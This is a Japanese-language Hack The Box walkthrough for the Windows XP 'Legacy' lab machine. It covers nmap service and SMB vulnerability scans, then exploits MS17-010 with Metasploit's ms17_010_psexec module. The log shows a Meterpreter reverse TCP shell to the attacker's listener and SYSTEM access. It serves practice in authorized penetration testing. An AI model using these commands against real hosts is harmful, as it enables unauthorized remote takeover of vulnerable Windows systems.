【HTB】Legacy(Easy)

HTB-windows

大まかに

  1. Nmapスキャン
  2. Nmap Scriptを用いたスキャン
  3. Google Search
  4. MetaSploit
  5. Get System

1. Nmap Scan

# sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4

# Nmap 7.93 scan initiated Fri May 12 00:52:11 2023 as: nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4
Increasing send delay for 10.10.10.4 from 0 to 5 due to 659 out of 1647 dropped probes since last increase.
Increasing send delay for 10.10.10.4 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.56s latency).
Scanned at 2023-05-12 00:52:11 EDT for 1998s
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE      REASON          VERSION
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows XP microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/12%OT=135%CT=1%CU=42068%PV=Y%DS=2%DC=I%G=Y%TM=645DCD
OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS
OS:=0)OPS(O1=M53ANW0NNT00NNS%O2=M53ANW0NNT00NNS%O3=M53ANW0NNT00%O4=M53ANW0N
OS:NT00NNS%O5=M53ANW0NNT00NNS%O6=M53ANNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W
OS:4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y%T=80%W=FAF0%O=M53ANW0NNS%CC=N%Q=)T1(
OS:R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=
OS:%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FAF0%S=O%A=S+%F=AS%O=M53ANW0NNT00NNS%RD=0%Q=
OS:)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h28m19s, deviation: 2h07m16s, median: 4d22h58m19s
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b93c06 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   005056b93c060000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40600/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 60076/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 50902/udp): CLEAN (Failed to receive data)
|   Check 4 (port 12744/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-05-17T10:23:36+03:00

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 12 01:25:29 2023 -- 1 IP address (1 host up) scanned in 1999.01 seconds

2. Nmap Script Scan

# nmap -p 139,445 -vv -Pn --script=smb-vuln* 10.10.10.4 -oN nmap-smb_enum.log

# Nmap 7.93 scan initiated Fri May 12 01:17:20 2023 as: nmap -p 139,445 -vv -Pn --script=smb-vuln* -oN nmap-smb_enum.log 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received user-set (0.60s latency).
Scanned at 2023-05-12 01:17:20 EDT for 16s

PORT    STATE SERVICE      REASON
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri May 12 01:17:36 2023 -- 1 IP address (1 host up) scanned in 15.92 seconds

以下の2つがありそうだなっていうのがわかった。

  • CVE-2008-4250
  • CVE-2017-0143

# 3. Google Search

 - Googleで2つのCVEについて調べてみた。

Easyレベルでバッファフローはあまりなさそうなのでこれじゃないと判断。

4. MetaSploit

```

msfconsole -q

msf6 > search MS17-010 msf6 > use exploit/windows/smb/ms17_010_psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

- show optionsで設定を確認。

msf6 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

Name Current Setting Required Description

DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check ts/named_pipes.txt RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/ using-metasploit.html RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w rite folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.3.10 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Automatic

View the full module info with the info, or info -d command.

- setコマンドを使用して「RHOSTS」と「LHOST」を設定する。

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.10.4 RHOST => 10.10.10.4 msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.16.8 LHOST => 10.10.16.8





msf6 exploit(windows/smb/ms17_010_psexec) > show options



Module options (exploit/windows/smb/ms17_010_psexec):



   Name                  Current Setting                               Required  Description






   DBGTRACE              false                                         yes       Show extra debug trace info
   LEAKATTEMPTS          99                                            yes       How many times to try to leak transaction
   NAMEDPIPE                                                           no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlis  yes       List of named pipes to check
                         ts/named_pipes.txt
   RHOSTS                10.10.10.4                                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                                                                 using-metasploit.html
   RPORT                 445                                           yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                 no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                no        The service display name
   SERVICE_NAME                                                        no        The service name
   SHARE                 ADMIN$                                        yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w
                                                                                 rite folder share
   SMBDomain             .                                             no        The Windows domain to use for authentication
   SMBPass                                                             no        The password for the specified username
   SMBUser                                                             no        The username to authenticate as



Payload options (windows/meterpreter/reverse_tcp):



   Name      Current Setting  Required  Description






   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.8       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port



Exploit target:



   Id  Name






   0   Automatic



View the full module info with the info, or info -d command.



- エクスプロイトを実行して、権限を確認{system権限が取れているのでこれでroot/userフラグを取得して終わり)




msf6 exploit(windows/smb/ms17_010_psexec) > run



[] Started reverse TCP handler on 10.10.16.8:4444
[] 10.10.10.4:445 - Target OS: Windows 5.1
[] 10.10.10.4:445 - Filling barrel with fish... done
[] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[] 10.10.10.4:445 -    [] Preparing dynamite...
[] 10.10.10.4:445 -        [] Trying stick 1 (x86)...Boom!
[] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x861137d0
[] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[] 10.10.10.4:445 - Selecting native target
[] 10.10.10.4:445 - Uploading payload... jWwmzfbo.exe
[] 10.10.10.4:445 - Created \jWwmzfbo.exe...
[+] 10.10.10.4:445 - Service started successfully...
[] Sending stage (175686 bytes) to 10.10.10.4
[] 10.10.10.4:445 - Deleting \jWwmzfbo.exe...
[*] Meterpreter session 1 opened (10.10.16.8:4444 -> 10.10.10.4:1035) at 2023-05-13 02:12:07 -0400



meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >